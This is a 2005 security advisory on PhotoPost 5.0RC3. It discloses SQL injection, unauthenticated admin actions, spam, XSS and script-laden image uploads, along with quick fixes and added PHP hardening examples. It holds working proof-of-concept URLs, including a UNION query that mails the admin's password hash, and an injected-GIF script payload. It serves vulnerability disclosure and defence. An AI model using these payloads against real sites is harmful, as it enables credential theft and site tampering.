photopost50rc3.txt

15 Mar 2005, reported by Igor Franchuk. Type: packetstorm. Source: packetstormsecurity.com

PhotoPost 5.0RC3 vulnerabilities, high severity: they allow remote attackers to steal sessions, manipulate photographs, and upload arbitrary content, through coding negligence and unsafe data filtering.

Code
` PhotoPost 5.0RC3, All Enthusiast, Inc, multiple vulnerabilities  
  
March 05 2005  
  
For your consideration.  
  
1. BACKGROUND  
PhotoPost is a popular commercial image publishing software.  
Everyone loves showing off their photos! Add PhotoPost to your site, or let us install it for you,  
and your visitors will be able to upload their photos to galleries on your site and interact in photo  
discussions. Join the 3,500+ sites that are already using PhotoPost and add a fun new dimension to your website.  
....  
Yeah, it is just that bad.  
  
2. IMPACT  
A series of vulnerabilities allows a remote attacker  
- to get arbitrary data from photopost tables (*)  
- to spam the administrator's mailbox  
- to steal sessions  
- to manipulate photographs  
- to XSS PhotoPost  
- to upload "image" files with arbitrary content  
(*) under some configurations; I will describe it in detail later  
  
3. SEVERITY  
HIGH  
  
4. ANALYSIS  
  
4.1 GETTING ARBITRARY DATA FROM PHOTOPOST TABLES  
PhotoPost (further on - PP) is built on a highly risky principle  
of filtering input data, based on magic_quotes:  
=------  
magic_quotes_gpc boolean  
Sets the magic_quotes state for GPC (Get/Post/Cookie) operations.  
When magic_quotes are on, all ' (single-quote), " (double quote), \ (backslash) and NUL's are escaped with a backslash automatically.  
=------  
Turning magic_quotes on is neglected by a large percentage of PP users.  
It is a good idea not to rely on the user in the essential matter of  
data filtering, and to write nested procedures based on the mysql_escape_string/mysql_real_escape_string  
functions instead. Adding a few native lines of code would have definitely  
fixed that "human" factor.  
Many users have no idea what magic_quotes is,  
what it is for, or where their negligence will lead them, even despite the  
warning PP gives while installing. If one were to  
look into the architecture PP is assembled upon, it would become clear  
that PP should not even attempt to install itself on systems with  
magic_quotes turned off.  
  
PROOF of CONCEPT  
To see whether PP is running in the environment with magic quotes  
turned off one might use the following URL:  
http://photopost.hosting.site/photopost/member.php?ppaction=rpwd&verifykey=0&uid=0%20union%20select%20"0","[email protected]",%20concat(username,"%20",%20password)%20from%20users  
no login required  
  
* replace [email protected] with your email address. If magic  
quotes are turned off, you'll get the admin's MD5 hash and user name by mail.  
  
* this URL might not work if the site runs an old MySQL version  
=---  
UNION is used to combine the result from many SELECT statements into one result set. UNION is available from MySQL 4.0.0 on  
.....  
=---  
UNION is the only way to effectively exploit PHP-based  
queries, due to the protection mysql_query provides: it was  
clever of the PHP developers not to allow multiple queries  
separated by ';'.  
  
QUICK FIX  
.htaccess  
php_value magic_quotes_gpc 1  
  
  
4.2 CODING NEGLIGENCE  
Analysis of the query (I) leads only to another security  
issue with PP. It has plenty of unsafe queries like  
  
"SELECT joindate,email,username FROM {$Globals['pp_db_prefix']}users WHERE userid=$uid"  
  
Notice that the database field userid is compared with  
$uid. $uid is supplied by the user and thereby its content  
is arbitrary, and still there are no quotes, no is_alpha or  
intval check, nothing of the kind. Looking at the code at  
random shows that, from time to time, PP does the  
checking, but the rule is not universal.  
  
Even if magic_quotes were turned on it might be possible  
to devise a query that passes through, one way or another,  
and gets data posted to your mail anyway. But the  
example query (I) won't do it. It is just constructed to pass  
the several conditions that stand before 'send' is invoked.  
  
QUICK FIX  
1) .htaccess  
php_value magic_quotes_gpc 1  
It will at least make exploitation more difficult.  
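As an added example (not PhotoPost's own code), here is the query pattern quoted above beside a form that does not depend on magic_quotes at all: $uid is checked to be a positive integer and bound as a parameter, and string columns are bound the same way. It assumes a mysqli connection in $db and the same $Globals configuration array; the function names are hypothetical.

```php
<?php
// Added example, not PhotoPost code. Assumes a mysqli connection $db and
// the PP config array $Globals (only 'pp_db_prefix' is used).
// The pattern the advisory quotes: $uid comes straight from the request and is
// interpolated unquoted, so its value is parsed as SQL. Shown for comparison only.
function lookup_user_unsafe(mysqli $db, array $Globals, $uid)
{
    $sql = "SELECT joindate,email,username FROM {$Globals['pp_db_prefix']}users WHERE userid=$uid";
    return $db->query($sql);
}

// Hardened form. userid is numeric, so anything that is not a positive integer is
// rejected before a query is built, and the value is bound rather than interpolated.
// This behaves the same whether magic_quotes_gpc is on or off.
function lookup_user(mysqli $db, array $Globals, $uid): ?array
{
    if (!ctype_digit((string) $uid) || (int) $uid < 1) {
        return null;                       // not a valid user id: no query at all
    }
    $id    = (int) $uid;
    $table = $Globals['pp_db_prefix'] . 'users';   // from config, never from the request
    $stmt  = $db->prepare("SELECT joindate,email,username FROM `$table` WHERE userid=?");
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $result = $stmt->get_result();         // needs the mysqlnd driver
    $row = ($result !== false) ? $result->fetch_assoc() : null;
    $stmt->close();
    return $row ?: null;
}

// String columns get the same treatment: bind the value instead of quoting it by hand.
function lookup_by_name(mysqli $db, array $Globals, string $username): ?array
{
    $table = $Globals['pp_db_prefix'] . 'users';
    $stmt  = $db->prepare("SELECT joindate,email,username FROM `$table` WHERE username=?");
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $result = $stmt->get_result();
    $row = ($result !== false) ? $result->fetch_assoc() : null;
    $stmt->close();
    return $row ?: null;
}
```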
  
4.3 SPAMMING THE ADMINISTRATOR MAILBOX WITH ARBITRARY CONTENT  
PP doesn't always check whether the user is authorized. Though,  
as in this particular case, there is a login attempt, it  
won't act on its result.  
  
The other problem is that PP absolutely doesn't care how  
many events were served (say, mail sending), how often,  
or how many authorization attempts were made. It is a kind of  
lack of policy; combined, it could lead to spam.  
  
PROOF of CONCEPT  
http://photopost.hosting.site/photopost/misc.php?action=reportpost&report=1&final=1  
no login required  
  
using this URL one may spam the administrator's email with an  
arbitrary number of letters and PP won't even try to stop it  
  
QUICK FIX  
adding  
    if ($User['userid'] == "") {  
        diewell( $Globals['pp_lang']['noreg'] );  
    }  
after authenticate() is invoked, in the if ($action == "reportpost")  
section, should fix the problem with  
unauthorized users.  
  
But it won't fix the problem in general: anyone who is  
authorized will still be able to spam the administrator.  
  
  
4.4 MANIPULATING USER PHOTOGRAPHS  
The problem is related to adm-photo.php: unlike all the other  
administrator scripts, it doesn't require "adm-inc.php".  
adm-inc.php has a built-in check that won't allow anybody  
except the administrator to pass further. That fact opens the  
door to the set of administrator functions built into  
adm-photo.php for everyone.  
  
As an example I decided to construct a URL that would  
rebuild thumbnails for a picture with a given PID (in our case  
it is 1), namely it will rotate it clockwise.  
  
PROOF of CONCEPT  
http://photopost.hosting.site/photopost/adm-photo.php?ppaction=manipulate&pid=1&dowhat=rebuildthumb&dowhat=rotateccw  
no login required  
  
I'm not sure it is not one of the "features", but it looks like  
no one but the admin should be allowed to do this job.  
  
QUICK FIX  
I believe adding  
require "adm-inc.php";  
will solve the problem.  
  
  
4.5 INSERTING ARBITRARY HTML CODE  
  
XSS1  
  
And finally, there is XSS in PP.  
  
function check_tags($data, $allowed){  
    $data = preg_replace("/<(.*?)>/e",  
        "process_tag(stripslashes('\\1'), \$allowed)",  
        $data);  
    $data = str_replace('javascript:','#',$data);  
    return $data;  
}  
  
I won't comment on it. Checking for  
javascript: this way is a very, very bad habit.  
  
In short, it is possible to form data in such a way that PP will upload  
a given URL. Then it will "check" for javascript using this lame  
rule.  
  
XSS2  
PP doesn't check the biography field 'editbio' in the user profile,  
so it can easily contain arbitrary HTML code, tags and  
javascript; when the personal information is viewed,  
the session might be stolen.  
  
QUICK FIX  
None  
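An added example (not from PhotoPost) of what the two XSS cases above call for: a scheme allow-list in place of the str_replace('javascript:', '#') rule, and output encoding for free-text fields such as the biography. The function names are hypothetical.

```php
<?php
// Added example, not PhotoPost code. Function names are hypothetical.

// Allow-list instead of a blacklist: a URL is kept only if it parses and its scheme
// is http or https. Anything else (a javascript: URL in any letter case, a URL
// with no scheme, or an unparsable string) is replaced by '#'.
// str_replace('javascript:', '#') is case-sensitive and matches one exact byte
// string, which is why it is the wrong tool for this job.
function safe_url(string $url): string
{
    $url = trim($url);
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return '#';
    }
    $scheme = strtolower($parts['scheme']);
    if ($scheme !== 'http' && $scheme !== 'https') {
        return '#';
    }
    return $url;
}

// Attribute values and text nodes are encoded at output time, regardless of what
// was stored; the link target has already been through the allow-list.
function render_link(string $href, string $text): string
{
    return '<a href="' . htmlspecialchars(safe_url($href), ENT_QUOTES, 'UTF-8') . '">'
         . htmlspecialchars($text, ENT_QUOTES, 'UTF-8') . '</a>';
}

// The 'editbio' field is shown as plain text: every <, >, ", ' and & is encoded,
// so HTML typed into the profile is displayed literally instead of being rendered.
function render_bio(string $bio): string
{
    return nl2br(htmlspecialchars($bio, ENT_QUOTES, 'UTF-8'));
}

// safe_url('http://example.com/photo.jpg') is returned unchanged;
// safe_url('JavaScript:...') and safe_url('/relative/path') both give '#'.
```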
  
4.6 UPLOADING IMAGES WITH ARBITRARY CONTENT  
  
PP allows uploading any file disguised as an image. It  
neither checks the file nor tries to normalize it  
to some internal standard. Basically one uploads JS as an  
image into PP, then spreads a DIRECT link to the uploaded  
image. IE will execute JS from a broken image transparently.  
  
PROOF OF CONCEPT  
injected.gif  
<script>  
document.write('<img src=http://www.microsoft.com/h/en-us/i/ts_1024_25_BillGWebcastB.jpg>');  
alert('Injected');  
</script>  
  
PP SHOULD load all uploaded images 'as a picture' and then, in case  
of success, save them 'as a picture' to guarantee that the  
file content is at least image/gif.  
  
QUICK FIX  
None  
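An added example (not PhotoPost code) of the "load as a picture, then save as a picture" check the paragraph above asks for: the upload is decoded with GD and, only if that succeeds, re-encoded from the decoded pixels, so the stored file holds image data and nothing else. It assumes the GD extension; the function name and the upload directory are hypothetical.

```php
<?php
// Added example, not PhotoPost code. Requires the GD extension.
// Returns the path of the re-encoded file, or null if the upload is not a
// decodable GIF, JPEG or PNG image.
function store_upload_as_image(string $tmpPath, string $destDir): ?string
{
    $raw = file_get_contents($tmpPath);
    if ($raw === false) {
        return null;
    }
    // Header check first: a script saved as injected.gif has no image header.
    $info = @getimagesize($tmpPath);
    if ($info === false) {
        return null;
    }
    $allowed = [IMAGETYPE_GIF => 'gif', IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png'];
    if (!isset($allowed[$info[2]])) {
        return null;
    }
    // Full decode: GD must be able to build a pixel buffer from the bytes.
    $img = @imagecreatefromstring($raw);
    if ($img === false) {
        return null;
    }
    // Re-encode from the pixel buffer: comments, trailing data and anything
    // that is not pixel data in the upload are not carried over.
    $dest = rtrim($destDir, '/') . '/' . bin2hex(random_bytes(8)) . '.' . $allowed[$info[2]];
    $ok = false;
    switch ($info[2]) {
        case IMAGETYPE_GIF:  $ok = imagegif($img, $dest);      break;
        case IMAGETYPE_JPEG: $ok = imagejpeg($img, $dest, 90); break;
        case IMAGETYPE_PNG:  $ok = imagepng($img, $dest);      break;
    }
    imagedestroy($img);
    return $ok ? $dest : null;
}

// Usage in an upload handler (assumes the form field is named 'photo' and a
// hypothetical upload directory):
// $path = store_upload_as_image($_FILES['photo']['tmp_name'], '/path/to/upload/dir');
// if ($path === null) { /* reject the upload */ }
```

Serving the stored file with the Content-Type that matches its extension completes the fix; the re-encoding alone already removes the script content the proof of concept relies on.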
  
5. VENDOR STATUS  
  
Informed a week ago by mail, with no response.  
Next time, if I have time to explore the sources again, I'll not inform this  
particular vendor. When this article was posted in the private PP forum  
it was removed almost immediately.  
  
Today I've got a letter (not personal) about a new 5.01 release. When  
looking in the fixed files I saw that it really fixes some issues with PP  
that were described in this article. Especially the e-mail bypass  
will not work in 5.01 under any condition.  
  
I believe you may easily find the vulnerable versions, as well as  
some of the source codes :-) with google.com  
  
  
--   
Best regards  
`
